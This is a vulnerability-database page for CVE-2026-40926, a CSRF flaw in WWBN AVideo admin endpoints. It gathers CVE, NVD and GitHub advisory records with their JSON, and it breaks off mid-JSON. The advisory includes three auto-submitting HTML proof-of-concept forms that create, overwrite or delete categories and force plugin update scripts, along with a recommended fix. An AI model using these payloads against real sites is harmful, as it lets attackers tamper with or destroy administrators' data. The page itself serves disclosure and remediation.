Vulnerability-Lookup

CVE-2026-40926 (GCVE-0-2026-40926)

Vulnerability from cvelistv5 – Published: 2026-04-21 22:12 – Updated: 2026-04-22 13:58

Title

WWBN AVideo Vulnerable to CSRF in Admin JSON Endpoints (Category CRUD, Plugin Update Script)

Summary

WWBN AVideo is an open source video platform. In versions 29.0 and prior, three admin-only JSON endpoints — `objects/categoryAddNew.json.php`, `objects/categoryDelete.json.php`, and `objects/pluginRunUpdateScript.json.php` — enforce only a role check (`Category::canCreateCategory()` / `User::isAdmin()`) and perform state-changing actions against the database without calling `isGlobalTokenValid()` or `forbidIfIsUntrustedRequest()`. Peer endpoints in the same directory (`pluginSwitch.json.php`, `pluginRunDatabaseScript.json.php`) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin's `updateScript()` method in the admin's session. Commit ee5615153c40628ab3ec6fe04962d1f92e67d3e2 contains a fix.

Severity ?

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/ee5615153c4…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 29.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40926",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-22T13:57:39.434922Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-22T13:58:06.149Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 29.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions 29.0 and prior, three admin-only JSON endpoints \u2014 `objects/categoryAddNew.json.php`, `objects/categoryDelete.json.php`, and `objects/pluginRunUpdateScript.json.php` \u2014 enforce only a role check (`Category::canCreateCategory()` / `User::isAdmin()`) and perform state-changing actions against the database without calling `isGlobalTokenValid()` or `forbidIfIsUntrustedRequest()`. Peer endpoints in the same directory (`pluginSwitch.json.php`, `pluginRunDatabaseScript.json.php`) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin\u0027s `updateScript()` method in the admin\u0027s session. Commit ee5615153c40628ab3ec6fe04962d1f92e67d3e2 contains a fix."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352: Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-21T22:12:28.883Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2"
        }
      ],
      "source": {
        "advisory": "GHSA-ffw8-fwxp-h64w",
        "discovery": "UNKNOWN"
      },
      "title": "WWBN AVideo Vulnerable to CSRF in Admin JSON Endpoints (Category CRUD, Plugin Update Script)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40926",
    "datePublished": "2026-04-21T22:12:28.883Z",
    "dateReserved": "2026-04-15T20:40:15.517Z",
    "dateUpdated": "2026-04-22T13:58:06.149Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40926",
      "date": "2026-04-23",
      "epss": "0.00019",
      "percentile": "0.05003"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40926\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-21T23:16:20.163\",\"lastModified\":\"2026-04-23T15:48:02.850\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions 29.0 and prior, three admin-only JSON endpoints \u2014 `objects/categoryAddNew.json.php`, `objects/categoryDelete.json.php`, and `objects/pluginRunUpdateScript.json.php` \u2014 enforce only a role check (`Category::canCreateCategory()` / `User::isAdmin()`) and perform state-changing actions against the database without calling `isGlobalTokenValid()` or `forbidIfIsUntrustedRequest()`. Peer endpoints in the same directory (`pluginSwitch.json.php`, `pluginRunDatabaseScript.json.php`) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin\u0027s `updateScript()` method in the admin\u0027s session. Commit ee5615153c40628ab3ec6fe04962d1f92e67d3e2 contains a fix.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-352\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"29.0\",\"matchCriteriaId\":\"AC38CA07-71C1-4C86-B84A-83CF96367CBA\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40926\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-22T13:57:39.434922Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-22T13:57:58.737Z\"}}], \"cna\": {\"title\": \"WWBN AVideo Vulnerable to CSRF in Admin JSON Endpoints (Category CRUD, Plugin Update Script)\", \"source\": {\"advisory\": \"GHSA-ffw8-fwxp-h64w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 29.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2\", \"name\": \"https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions 29.0 and prior, three admin-only JSON endpoints \\u2014 `objects/categoryAddNew.json.php`, `objects/categoryDelete.json.php`, and `objects/pluginRunUpdateScript.json.php` \\u2014 enforce only a role check (`Category::canCreateCategory()` / `User::isAdmin()`) and perform state-changing actions against the database without calling `isGlobalTokenValid()` or `forbidIfIsUntrustedRequest()`. Peer endpoints in the same directory (`pluginSwitch.json.php`, `pluginRunDatabaseScript.json.php`) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin\u0027s `updateScript()` method in the admin\u0027s session. Commit ee5615153c40628ab3ec6fe04962d1f92e67d3e2 contains a fix.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-352\", \"description\": \"CWE-352: Cross-Site Request Forgery (CSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-21T22:12:28.883Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40926\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-22T13:58:06.149Z\", \"dateReserved\": \"2026-04-15T20:40:15.517Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-21T22:12:28.883Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-40926

Vulnerability from fkie_nvd - Published: 2026-04-21 23:16 - Updated: 2026-04-23 15:48

Severity ?

7.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2	Patch
security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC38CA07-71C1-4C86-B84A-83CF96367CBA",
              "versionEndIncluding": "29.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions 29.0 and prior, three admin-only JSON endpoints \u2014 `objects/categoryAddNew.json.php`, `objects/categoryDelete.json.php`, and `objects/pluginRunUpdateScript.json.php` \u2014 enforce only a role check (`Category::canCreateCategory()` / `User::isAdmin()`) and perform state-changing actions against the database without calling `isGlobalTokenValid()` or `forbidIfIsUntrustedRequest()`. Peer endpoints in the same directory (`pluginSwitch.json.php`, `pluginRunDatabaseScript.json.php`) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin\u0027s `updateScript()` method in the admin\u0027s session. Commit ee5615153c40628ab3ec6fe04962d1f92e67d3e2 contains a fix."
    }
  ],
  "id": "CVE-2026-40926",
  "lastModified": "2026-04-23T15:48:02.850",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 7.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-21T23:16:20.163",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-FFW8-FWXP-H64W

Vulnerability from github – Published: 2026-04-14 23:12 – Updated: 2026-04-14 23:12

Summary

WWBN AVideo has Multiple CSRF Vulnerabilities in Admin JSON Endpoints (Category CRUD, Plugin Update Script)

Details

Summary

Three admin-only JSON endpoints — objects/categoryAddNew.json.php, objects/categoryDelete.json.php, and objects/pluginRunUpdateScript.json.php — enforce only a role check (Category::canCreateCategory() / User::isAdmin()) and perform state-changing actions against the database without calling isGlobalTokenValid() or forbidIfIsUntrustedRequest(). Peer endpoints in the same directory (pluginSwitch.json.php, pluginRunDatabaseScript.json.php) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin's updateScript() method in the admin's session.

Details

AVideo's CSRF defense is not applied globally — each endpoint must explicitly call isGlobalTokenValid() (defined in objects/functions.php:2313), which verifies $_REQUEST['globalToken']. A search across the codebase shows 18 files that correctly invoke forbidIfIsUntrustedRequest() or isGlobalTokenValid(), while the three endpoints below do not.

1. `objects/categoryAddNew.json.php:18` — CSRF create/overwrite category

 18 if (!Category::canCreateCategory()) {
 19     $obj->msg = __("Permission denied");
 20     die(json_encode($obj));
 21 }
 22
 23 $objCat = new Category(intval(@$_POST['id']));
 24 $objCat->setName($_POST['name']);
 25 $objCat->setClean_name($_POST['clean_name']);
 26 $objCat->setDescription($_POST['description']);
 27 $objCat->setIconClass($_POST['iconClass']);
 28 $objCat->setSuggested($_POST['suggested']);
 29 $objCat->setParentId($_POST['parentId']);
 30 $objCat->setPrivate($_POST['private']);
 31 $objCat->setAllow_download($_POST['allow_download']);
 32 $objCat->setOrder($_POST['order']);
 33 $obj->categories_id = $objCat->save();

Category::canCreateCategory() (objects/category.php:620-630) returns true for any admin. Because the row is loaded via new Category(intval(@$_POST['id'])), a non-zero id causes the existing row to be overwritten, not just created — the same primitive can mutate existing categories. No CSRF/Origin check precedes the write.

2. `objects/categoryDelete.json.php:10` — CSRF delete category

 10 if (!Category::canCreateCategory()) {
 11     die('{"error":"' . __("Permission denied") . '"}');
 12 }
 13 require_once 'category.php';
 14 $obj = new Category($_POST['id']);
 15 $response = $obj->delete();

No token check. An attacker can force an admin browser to POST any id, deleting rows from categories.

3. `objects/pluginRunUpdateScript.json.php:9` — CSRF forced plugin update

  9 if (!User::isAdmin()) {
 10     forbiddenPage('Permission denied');
 11 }
 12 if (empty($_POST['name'])) {
 13     forbiddenPage('Name can\'t be blank');
 14 }
 15 ini_set('max_execution_time', 300);
 16 require_once $global['systemRootPath'] . 'plugin/AVideoPlugin.php';
 17
 18 if($_POST['uuid'] == 'plist12345-370-4b1f-977a-fd0e5cabtube'){
 19     $_POST['name'] = 'PlayLists';
 20 }
 21
 22 $obj = new stdClass();
 23 $obj->error = !AVideoPlugin::updatePlugin($_POST['name']);

AVideoPlugin::updatePlugin() (plugin/AVideoPlugin.php:1452) looks up the plugin by name and, if it defines an updateScript() method, invokes it and then records the new plugin version via Plugin::setCurrentVersionByUuid. No CSRF or Origin check precedes this. By contrast, the sibling endpoint objects/pluginRunDatabaseScript.json.php:16 does call isGlobalTokenValid(), and objects/pluginSwitch.json.php:12 also calls it — confirming this file is an omission.

Why no global mitigation blocks this

isGlobalTokenValid() is not invoked from objects/configuration.php or any other bootstrap; it must be called per-endpoint.
isUntrustedRequest() (objects/functionsSecurity.php:146) is only triggered via an explicit call to forbidIfIsUntrustedRequest(); none of the three endpoints call it.
The handlers use $_POST directly without any framework-level CSRF middleware (AVideo does not use one).
Category::canCreateCategory() is purely a role check and does not examine request origin or tokens.

PoC

All three require the victim to be a logged-in AVideo administrator who visits the attacker-hosted page. Cookies are sent automatically by the browser.

PoC 1 — Create/overwrite category

<!-- evil-create.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/categoryAddNew.json.php" method="POST">
  <input name="id" value="0">            <!-- 0 = create; any existing id = overwrite -->
  <input name="name" value="Owned">
  <input name="clean_name" value="owned">
  <input name="description" value="pwn">
  <input name="iconClass" value="fas fa-skull">
  <input name="suggested" value="1">
  <input name="parentId" value="0">
  <input name="private" value="0">
  <input name="allow_download" value="1">
  <input name="order" value="1">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>

Expected: a new row appears in the categories table, returned as {"error":false,"categories_id":<n>,...}. Changing id=0 to an existing category id overwrites that row's fields.

PoC 2 — Delete category

<!-- evil-delete.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/categoryDelete.json.php" method="POST">
  <input name="id" value="2">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>

Multiple hidden iframes with different id values can walk the category id space and wipe the category tree.

PoC 3 — Force plugin updateScript()

<!-- evil-plugin-update.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/pluginRunUpdateScript.json.php" method="POST">
  <input name="name" value="Live">
  <input name="uuid" value="anything">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>

Expected: server logs AVideoPlugin::updatePlugin name=(Live) uuid=(...) and the plugin's updateScript() runs in the admin's session, with execution time extended to 300s.

Impact

Integrity: An attacker can silently cause the admin's browser to create, mutate, or delete rows in the categories table. Overwrite is especially damaging because field-level state (parent, privacy, allow_download, clean_name, iconClass) is changed without any UI feedback to the admin. Combined with any view that renders description without escaping, this becomes a vector for stored XSS propagation.
Availability (partial): categoryDelete.json.php is a pure destructive primitive that allows category rows to be removed one by one by iterating ids; there is no recovery flow.
Privileged code execution trigger: pluginRunUpdateScript.json.php lets the attacker force execution of any installed plugin's updateScript() method (with a 5-minute execution window) in the admin's context. When chained with other primitives that influence plugin state or the plugin's own update logic, this is a foothold for deeper compromise.
Blast radius: Each vulnerable endpoint requires only a single admin visit to any attacker-controlled page (XSS on a third-party site, a phishing link, a forum post with an auto-submitting form). No interaction beyond loading the page is required.

Recommended Fix

Add an explicit CSRF token check (and ideally an Origin check) to each endpoint, matching the pattern already used by pluginSwitch.json.php and pluginRunDatabaseScript.json.php.

// objects/categoryAddNew.json.php (after line 18)
if (!Category::canCreateCategory()) {
    $obj->msg = __("Permission denied");
    die(json_encode($obj));
}
if (!isGlobalTokenValid()) {
    http_response_code(403);
    die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();

// objects/categoryDelete.json.php (after line 12)
if (!Category::canCreateCategory()) {
    die('{"error":"' . __("Permission denied") . '"}');
}
if (!isGlobalTokenValid()) {
    http_response_code(403);
    die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();

// objects/pluginRunUpdateScript.json.php (after line 11)
if (!User::isAdmin()) {
    forbiddenPage('Permission denied');
}
if (!isGlobalTokenValid()) {
    http_response_code(403);
    die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();

The long-term fix is to apply forbidIfIsUntrustedRequest() to every state-changing JSON endpoint via a shared include (e.g., a mandatory bootstrap file loaded by all *.json.php endpoints), so that future handlers cannot forget the check.

Severity ?

7.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T23:12:39Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThree admin-only JSON endpoints \u2014 `objects/categoryAddNew.json.php`, `objects/categoryDelete.json.php`, and `objects/pluginRunUpdateScript.json.php` \u2014 enforce only a role check (`Category::canCreateCategory()` / `User::isAdmin()`) and perform state-changing actions against the database without calling `isGlobalTokenValid()` or `forbidIfIsUntrustedRequest()`. Peer endpoints in the same directory (`pluginSwitch.json.php`, `pluginRunDatabaseScript.json.php`) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin\u0027s `updateScript()` method in the admin\u0027s session.\n\n## Details\n\nAVideo\u0027s CSRF defense is not applied globally \u2014 each endpoint must explicitly call `isGlobalTokenValid()` (defined in `objects/functions.php:2313`), which verifies `$_REQUEST[\u0027globalToken\u0027]`. A search across the codebase shows 18 files that correctly invoke `forbidIfIsUntrustedRequest()` or `isGlobalTokenValid()`, while the three endpoints below do not.\n\n### 1. `objects/categoryAddNew.json.php:18` \u2014 CSRF create/overwrite category\n\n```php\n 18 if (!Category::canCreateCategory()) {\n 19     $obj-\u003emsg = __(\"Permission denied\");\n 20     die(json_encode($obj));\n 21 }\n 22\n 23 $objCat = new Category(intval(@$_POST[\u0027id\u0027]));\n 24 $objCat-\u003esetName($_POST[\u0027name\u0027]);\n 25 $objCat-\u003esetClean_name($_POST[\u0027clean_name\u0027]);\n 26 $objCat-\u003esetDescription($_POST[\u0027description\u0027]);\n 27 $objCat-\u003esetIconClass($_POST[\u0027iconClass\u0027]);\n 28 $objCat-\u003esetSuggested($_POST[\u0027suggested\u0027]);\n 29 $objCat-\u003esetParentId($_POST[\u0027parentId\u0027]);\n 30 $objCat-\u003esetPrivate($_POST[\u0027private\u0027]);\n 31 $objCat-\u003esetAllow_download($_POST[\u0027allow_download\u0027]);\n 32 $objCat-\u003esetOrder($_POST[\u0027order\u0027]);\n 33 $obj-\u003ecategories_id = $objCat-\u003esave();\n```\n\n`Category::canCreateCategory()` (`objects/category.php:620-630`) returns true for any admin. Because the row is loaded via `new Category(intval(@$_POST[\u0027id\u0027]))`, a non-zero `id` causes the existing row to be overwritten, not just created \u2014 the same primitive can mutate existing categories. No CSRF/Origin check precedes the write.\n\n### 2. `objects/categoryDelete.json.php:10` \u2014 CSRF delete category\n\n```php\n 10 if (!Category::canCreateCategory()) {\n 11     die(\u0027{\"error\":\"\u0027 . __(\"Permission denied\") . \u0027\"}\u0027);\n 12 }\n 13 require_once \u0027category.php\u0027;\n 14 $obj = new Category($_POST[\u0027id\u0027]);\n 15 $response = $obj-\u003edelete();\n```\n\nNo token check. An attacker can force an admin browser to POST any `id`, deleting rows from `categories`.\n\n### 3. `objects/pluginRunUpdateScript.json.php:9` \u2014 CSRF forced plugin update\n\n```php\n  9 if (!User::isAdmin()) {\n 10     forbiddenPage(\u0027Permission denied\u0027);\n 11 }\n 12 if (empty($_POST[\u0027name\u0027])) {\n 13     forbiddenPage(\u0027Name can\\\u0027t be blank\u0027);\n 14 }\n 15 ini_set(\u0027max_execution_time\u0027, 300);\n 16 require_once $global[\u0027systemRootPath\u0027] . \u0027plugin/AVideoPlugin.php\u0027;\n 17\n 18 if($_POST[\u0027uuid\u0027] == \u0027plist12345-370-4b1f-977a-fd0e5cabtube\u0027){\n 19     $_POST[\u0027name\u0027] = \u0027PlayLists\u0027;\n 20 }\n 21\n 22 $obj = new stdClass();\n 23 $obj-\u003eerror = !AVideoPlugin::updatePlugin($_POST[\u0027name\u0027]);\n```\n\n`AVideoPlugin::updatePlugin()` (`plugin/AVideoPlugin.php:1452`) looks up the plugin by name and, if it defines an `updateScript()` method, invokes it and then records the new plugin version via `Plugin::setCurrentVersionByUuid`. No CSRF or Origin check precedes this. By contrast, the sibling endpoint `objects/pluginRunDatabaseScript.json.php:16` does call `isGlobalTokenValid()`, and `objects/pluginSwitch.json.php:12` also calls it \u2014 confirming this file is an omission.\n\n### Why no global mitigation blocks this\n\n- `isGlobalTokenValid()` is not invoked from `objects/configuration.php` or any other bootstrap; it must be called per-endpoint.\n- `isUntrustedRequest()` (`objects/functionsSecurity.php:146`) is only triggered via an explicit call to `forbidIfIsUntrustedRequest()`; none of the three endpoints call it.\n- The handlers use `$_POST` directly without any framework-level CSRF middleware (AVideo does not use one).\n- `Category::canCreateCategory()` is purely a role check and does not examine request origin or tokens.\n\n## PoC\n\nAll three require the victim to be a logged-in AVideo administrator who visits the attacker-hosted page. Cookies are sent automatically by the browser.\n\n### PoC 1 \u2014 Create/overwrite category\n\n```html\n\u003c!-- evil-create.html --\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003cform id=f action=\"https://victim.example.com/objects/categoryAddNew.json.php\" method=\"POST\"\u003e\n  \u003cinput name=\"id\" value=\"0\"\u003e            \u003c!-- 0 = create; any existing id = overwrite --\u003e\n  \u003cinput name=\"name\" value=\"Owned\"\u003e\n  \u003cinput name=\"clean_name\" value=\"owned\"\u003e\n  \u003cinput name=\"description\" value=\"pwn\"\u003e\n  \u003cinput name=\"iconClass\" value=\"fas fa-skull\"\u003e\n  \u003cinput name=\"suggested\" value=\"1\"\u003e\n  \u003cinput name=\"parentId\" value=\"0\"\u003e\n  \u003cinput name=\"private\" value=\"0\"\u003e\n  \u003cinput name=\"allow_download\" value=\"1\"\u003e\n  \u003cinput name=\"order\" value=\"1\"\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.getElementById(\u0027f\u0027).submit();\u003c/script\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nExpected: a new row appears in the `categories` table, returned as `{\"error\":false,\"categories_id\":\u003cn\u003e,...}`. Changing `id=0` to an existing category id overwrites that row\u0027s fields.\n\n### PoC 2 \u2014 Delete category\n\n```html\n\u003c!-- evil-delete.html --\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003cform id=f action=\"https://victim.example.com/objects/categoryDelete.json.php\" method=\"POST\"\u003e\n  \u003cinput name=\"id\" value=\"2\"\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.getElementById(\u0027f\u0027).submit();\u003c/script\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nMultiple hidden iframes with different `id` values can walk the category id space and wipe the category tree.\n\n### PoC 3 \u2014 Force plugin updateScript()\n\n```html\n\u003c!-- 